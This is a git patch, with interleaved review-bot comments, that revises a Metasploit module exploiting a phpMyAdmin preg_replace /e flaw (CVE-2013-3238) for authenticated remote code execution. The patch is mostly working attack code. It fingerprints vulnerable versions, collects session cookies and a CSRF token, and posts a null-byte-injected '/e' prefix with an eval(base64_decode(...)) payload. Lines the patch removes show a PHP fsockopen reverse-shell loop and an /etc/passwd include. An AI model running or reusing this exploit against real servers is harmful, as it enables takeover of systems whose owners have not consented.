From 9ad19ed2bfa715b43936fcb81f5d80fb31dcaa8b Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 26 Apr 2013 15:41:28 +0100 Subject: [PATCH] Final tidyup --- lib/rex/proto/http/response.rb | 2 +- .../multi/php/phpmyadmin_preg_replace.rb | 115 +++++++++--------- 2 files changed, 59 insertions(+), 58 deletions(-) diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb index e13d79eb0f..1b638399a7 100644 --- a/lib/rex/proto/http/response.rb +++ b/lib/rex/proto/http/response.rb @@ -59,7 +59,7 @@ class Response < Packet end # - # Returns a cookie value + # Returns a cookie value from the Set-Cookie header # def get_cookie(cookie) unless self.headers.include? 'Set-Cookie' diff --git a/modules/exploits/multi/php/phpmyadmin_preg_replace.rb b/modules/exploits/multi/php/phpmyadmin_preg_replace.rb index 0b2dd124ef..66f3522ecd 100644 --- a/modules/exploits/multi/php/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/php/phpmyadmin_preg_replace.rb 
@@ -11,49 +11,45 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer - include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()', 'Description' => %q{ - This module exploits a vulnerability in PhpMyAdmin's setup + This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's + replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php }, 'Author' => [ 'Janek "waraxe" Vind', # Discovery - 'Ben Campbell ' # metasploit module + 'Ben Campbell ' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2009-1151' ], - [ 'OSVDB', '53076' ], - [ 'EDB', '8921' ], - [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ], - [ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ] + [ 'CVE', '2013-3238' ], + [ 'PMASA', '2013-2'], + [ 'waraxe', '2013-SA#103' ], + [ 'URL', 'http://www.waraxe.us/advisory-103.html' ], ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { - 'Space' => 4000, # unlimited really since our shellcode gets written to a file 'DisableNops' => true, - # No filtering whatsoever, so no badchars - 'Compat' => - { - 'ConnectionType' => 'find', - }, - 'Keys' => ['php'], + 'Compat' => { 'ConnectionType' => 'find' } + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' }, 'Targets' => [ - [ 'Automatic (phpMyAdmin 4.0.0-RC2 and 3.5.8)', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 26 2013')) + 'DisclosureDate' => 'Apr 25 2013')) register_options( [ 
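Review bot: The new Description names `db_settings.php` as the entry point, but the request the exploit method builds (in a later hunk of this file) is sent to `uri('db_structure.php')`, so the two disagree and a reader cannot tell which page is actually meant. Presumably the description is the one in error; I'd change it to `replace_prefix_tbl in libraries/mult_submits.inc.php via db_structure.php` after confirming against the referenced advisory. The `initialize` body that this hunk edits continues past the end of the hunk.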
@@ -68,19 +64,45 @@ class Metasploit3 < Msf::Exploit::Remote end def check - path = uri('/js/messages.php') - res = send_request_cgi({ 'uri' => path }) + begin + res = send_request_cgi({ 'uri' => uri('/js/messages.php') }) + rescue + print_error("Unable to connect to server.") + return CheckCode::Unknown + end - return CheckCode::Unknown if res.nil? + if res.code != 200 + print_error("Unable to query /js/messages.php") + return CheckCode::Unknown + end - if res.body =~ /pmaversion = '3\.5\.8'/ - return CheckCode::Vulnerable + if res.body =~ /pmaversion = '(.*)';/ + print_status("Server version: #{$1}") + case $1.downcase + when '3.5.8.1', '4.0.0-rc3' + return CheckCode::Safe + when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2' + return CheckCode::Vulnerable + else + if $1.starts_with? '3.5.' + return CheckCode::Vulnerable + end + + return CheckCode::Unknown + end end end def exploit - cookie_names = ['phpMyAdmin', 'pma_mcrypt_iv', 'pmaUser-1', 'pmaPass-1', 'pma_lang', 'pma_collation_connection'] - # First, grab the CSRF token + cookie_names = [ + 'phpMyAdmin', + 'pma_mcrypt_iv', + 'pmaUser-1', + 'pmaPass-1', + 'pma_lang', + 'pma_collation_connection' + ] + print_status("Grabbing CSRF token") response = send_request_cgi({ 'uri' => uri}) if response.nil? 
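Review bot: `if res.code != 200` in the rewritten `check` is reached without a nil guard: `send_request_cgi` can return nil (no response received) rather than raising, and this hunk deletes the old `return CheckCode::Unknown if res.nil?`, so that path now raises NoMethodError instead of reporting Unknown — change the test to `if res.nil? || res.code != 200`. In the version branch, `$1.starts_with? '3.5.'` is not a core Ruby String method (core is `start_with?`); unless a Rex or ActiveSupport extension supplies it, every unlisted 3.x version string raises there. When the `pmaversion` regex does not match at all, the method falls off the end of the `if` and returns nil rather than a CheckCode; add `CheckCode::Unknown` as the final expression of `check`. The `exploit` method that starts at the end of this hunk continues outside it.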
@@ -125,49 +147,28 @@ class Metasploit3 < Msf::Exploit::Remote cookie << login.get_cookie(name) << " " end - db_enum = send_request_cgi({ - 'uri' => uri('navigation.php'), - 'cookie' => cookie, - 'vars_get' => { 'token' => token }, - }) - - dbs = db_enum.body.scan(/index\.php\?db=(.*)&/).flatten - start_service() - print_status("Sending request") - pay = Rex::Text.uri_encode(payload.encoded.gsub("\t","").gsub("\n","")) - pay = "include('../../../../../etc/passwd');" - #pay = "print('hello') print 'you'; $ip_addr='1'; print 'hello';" -# pay = Rex::Text.uri_encode('print "test";$s=fsockopen("ssl://",4444);while(!feof($s)){exec(fgets($s),$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);};print "test";') - p pay + db = rand_text_alpha(3+rand(3)) + pay = Rex::Text.encode_base64(payload.encoded) evil = "query_type=replace_prefix_tbl" - evil << "&reload=0" - evil << "&db=#{dbs[0]}" - evil << "&selected%5B0%5D=test" + evil << "&db=#{db}" + evil << "&selected%5B0%5D=#{db}" evil << "&token=#{token}" evil << "&from_prefix=%2Fe%00" - evil << "&to_prefix=#{pay}" + evil << "&to_prefix=eval(base64_decode('#{pay}'))" evil << "&mult_btn=Yes" - response = send_request_raw({ + print_status("Sending exploit payload") + exploit_result = send_request_raw({ 'uri' => uri('db_structure.php'), 'method' => 'POST', - 'data' => evil, + 'data' => evil, 'cookie' => cookie, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' } - }) + },2) - p response.body[0..100] - if response.body =~ /test1234/ - print_good("win") + if exploit_result + print_error("Response retrieved from server, exploit failed.") end - - sleep(30) - - end - - def on_request_uri(cli, req) - php = "" - send_response(cli, "") end end